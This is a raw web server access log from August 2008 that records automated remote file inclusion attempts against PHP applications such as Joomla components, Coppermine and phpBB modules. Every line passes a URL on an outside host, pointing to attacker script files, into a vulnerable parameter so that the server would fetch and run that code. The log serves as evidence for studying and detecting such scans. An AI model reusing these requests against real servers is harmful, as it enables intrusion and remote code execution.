67.19.51.194 - - [10/Aug/2008:19:04:15 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
67.19.51.194 - - [10/Aug/2008:19:04:20 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
67.19.51.194 - - [10/Aug/2008:19:05:36 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
207.44.244.37 - - [10/Aug/2008:19:06:34 -0600] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 240 "-" "Microsoft Pocket Internet Explorer/0.6"
207.44.244.37 - - [10/Aug/2008:19:06:34 -0600] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 245 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
219.117.239.114 - - [10/Aug/2008:19:07:35 -0600] "GET /logs/access_log.20080713//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
202.70.83.4 - - [10/Aug/2008:19:10:51 -0600] "GET /logs/access_log.20080706//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
202.70.83.4 - - [10/Aug/2008:19:10:51 -0600] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.803"
207.44.244.37 - - [10/Aug/2008:19:11:28 -0600] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.44.244.37 - - [10/Aug/2008:19:11:28 -0600] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
70.85.102.100 - - [10/Aug/2008:19:11:53 -0600] "GET //modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
70.85.102.100 - - [10/Aug/2008:19:11:53 -0600] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.85.102.132 - - [10/Aug/2008:19:13:26 -0600] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.61 [en] (OS/2; U)"
70.85.102.132 - - [10/Aug/2008:19:13:26 -0600] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 228 "-" "Advanced Browser (http://www.avantbrowser.com)"
64.49.254.139 - - [10/Aug/2008:19:13:56 -0600] "GET /logs/error_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:19:13:56 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:19:13:56 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /logs/error_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /logs/error_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:03 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:27 -0600] "GET /logs/access_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:19:14:27 -0600] "GET /logs/access_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:19:14:43 -0600] "GET /logs/error_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:19:14:43 -0600] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:19:14:43 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:19:15:06 -0600] "GET /logs/access_log.20080406/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
202.70.83.4 - - [10/Aug/2008:19:15:24 -0600] "GET /logs/access_log.20080330//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
194.79.75.195 - - [10/Aug/2008:19:15:57 -0600] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
64.49.254.139 - - [10/Aug/2008:19:20:09 -0600] "GET /logs/error_log.20080420/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
195.5.163.212 - - [10/Aug/2008:19:22:32 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.5.163.212 - - [10/Aug/2008:19:22:32 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
129.142.67.13 - - [10/Aug/2008:19:22:35 -0600] "GET /logs/access_log.20080420//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:19:22:35 -0600] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:19:22:35 -0600] "GET /logs//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:19:22:35 -0600] "GET /logs/access_log.20080420//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:19:22:35 -0600] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:19:22:36 -0600] "GET /logs//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
70.85.102.100 - - [10/Aug/2008:19:22:51 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
70.85.102.100 - - [10/Aug/2008:19:22:51 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
81.177.3.99 - - [10/Aug/2008:19:24:10 -0600] "GET /logs/access_log.20080713/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:24:11 -0600] "GET /index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:24:11 -0600] "GET /logs/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.813"
207.44.244.37 - - [10/Aug/2008:19:24:13 -0600] "GET /skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
207.44.244.37 - - [10/Aug/2008:19:24:13 -0600] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
81.177.3.99 - - [10/Aug/2008:19:24:14 -0600] "GET /logs/access_log.20080713/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:24:14 -0600] "GET /index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:24:14 -0600] "GET /logs/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.813"
195.5.163.212 - - [10/Aug/2008:19:25:28 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
194.79.75.195 - - [10/Aug/2008:19:25:44 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
66.230.197.245 - - [10/Aug/2008:19:25:53 -0600] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
195.5.163.212 - - [10/Aug/2008:19:25:54 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
194.79.75.195 - - [10/Aug/2008:19:25:58 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
70.85.102.100 - - [10/Aug/2008:19:26:57 -0600] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
70.85.102.100 - - [10/Aug/2008:19:26:57 -0600] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
72.55.137.228 - - [10/Aug/2008:19:27:24 -0600] "GET ///admin/index.php?DOCUMENT_ROOT=http://medisana.co.kr/test?? HTTP/1.1" 404 223 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:28:24 -0600] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:28:25 -0600] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:29:32 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
194.79.75.195 - - [10/Aug/2008:19:29:32 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.5.163.212 - - [10/Aug/2008:19:29:40 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
195.5.163.212 - - [10/Aug/2008:19:29:40 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
195.5.163.212 - - [10/Aug/2008:19:29:42 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
70.85.102.100 - - [10/Aug/2008:19:30:27 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.85.102.100 - - [10/Aug/2008:19:30:27 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
70.85.102.100 - - [10/Aug/2008:19:30:37 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
70.85.102.100 - - [10/Aug/2008:19:30:37 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
194.79.75.195 - - [10/Aug/2008:19:30:41 -0600] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/3.0 (OS/2; U)"
194.79.75.195 - - [10/Aug/2008:19:30:41 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
194.79.75.195 - - [10/Aug/2008:19:31:07 -0600] "GET /logs/error_log.20080406/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:31:07 -0600] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:31:26 -0600] "GET /logs/access_log.20080406/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:31:33 -0600] "GET /logs/error_log.20080713/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:31:33 -0600] "GET /errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:19:31:34 -0600] "GET /logs/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
89.111.172.23 - - [10/Aug/2008:19:32:11 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:32:11 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
194.79.75.195 - - [10/Aug/2008:19:33:05 -0600] "GET /logs/access_log.20080713/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
219.117.239.114 - - [10/Aug/2008:19:35:37 -0600] "GET /logs/error_log.20080406//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.65"
84.21.71.133 - - [10/Aug/2008:19:35:50 -0600] "GET /components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
84.21.71.133 - - [10/Aug/2008:19:35:50 -0600] "GET /logs/error_log/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
84.21.71.133 - - [10/Aug/2008:19:35:52 -0600] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
210.245.226.25 - - [10/Aug/2008:19:36:09 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:19:36:09 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
89.111.172.23 - - [10/Aug/2008:19:37:00 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
67.19.51.194 - - [10/Aug/2008:19:37:18 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
195.5.163.212 - - [10/Aug/2008:19:38:31 -0600] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
64.59.70.177 - - [10/Aug/2008:19:38:50 -0600] "GET /logs/error_log.20080406/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 315 "-" "libwww-perl/5.79"
64.59.70.177 - - [10/Aug/2008:19:38:50 -0600] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
64.59.70.177 - - [10/Aug/2008:19:38:50 -0600] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
89.111.172.23 - - [10/Aug/2008:19:40:07 -0600] "GET /logs/access_log.20080713//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
89.111.172.23 - - [10/Aug/2008:19:40:07 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
70.85.102.100 - - [10/Aug/2008:19:40:21 -0600] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
70.85.102.100 - - [10/Aug/2008:19:40:23 -0600] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
219.117.239.114 - - [10/Aug/2008:19:40:29 -0600] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5822 "-" "libwww-perl/5.65"
70.85.102.132 - - [10/Aug/2008:19:40:42 -0600] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.85.102.132 - - [10/Aug/2008:19:40:42 -0600] "GET /tiny_includes/config.php?dir_ws=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
64.13.251.55 - - [10/Aug/2008:19:40:55 -0600] "GET /logs/access_log.20080525/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
64.13.251.55 - - [10/Aug/2008:19:40:55 -0600] "GET /Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
64.13.251.55 - - [10/Aug/2008:19:40:56 -0600] "GET /logs/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
81.177.3.99 - - [10/Aug/2008:19:41:12 -0600] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:41:12 -0600] "GET /logs/error_log.20080406/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 315 "-" "libwww-perl/5.813"
81.177.3.99 - - [10/Aug/2008:19:41:13 -0600] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
66.230.197.245 - - [10/Aug/2008:19:41:47 -0600] "GET /logs/error_log.20080406/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:41:47 -0600] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
66.230.197.245 - - [10/Aug/2008:19:41:47 -0600] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
219.117.239.114 - - [10/Aug/2008:19:41:55 -0600] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
89.111.172.23 - - [10/Aug/2008:19:41:59 -0600] "GET /logs/access_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
202.133.244.61 - - [10/Aug/2008:19:43:59 -0600] "GET /logs/error_log.20080525/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 315 "-" "libwww-perl/5.79"
202.133.244.61 - - [10/Aug/2008:19:44:00 -0600] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
202.133.244.61 - - [10/Aug/2008:19:44:00 -0600] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
210.245.226.25 - - [10/Aug/2008:19:44:08 -0600] "GET /logs/access_log.20080713//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:19:44:09 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
210.245.226.25 - - [10/Aug/2008:19:44:09 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
84.21.71.133 - - [10/Aug/2008:19:44:49 -0600] "GET /logs/access_log.20080420//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
84.21.71.133 - - [10/Aug/2008:19:45:01 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
84.21.71.133 - - [10/Aug/2008:19:45:01 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
64.13.251.55 - - [10/Aug/2008:19:45:11 -0600] "GET /logs/access_log.20080511/Config.php?path_to_root=http://www.rcbaleares.com//images/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
84.21.71.133 - - [10/Aug/2008:19:45:17 -0600] "GET /logs/error_log.20080420//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
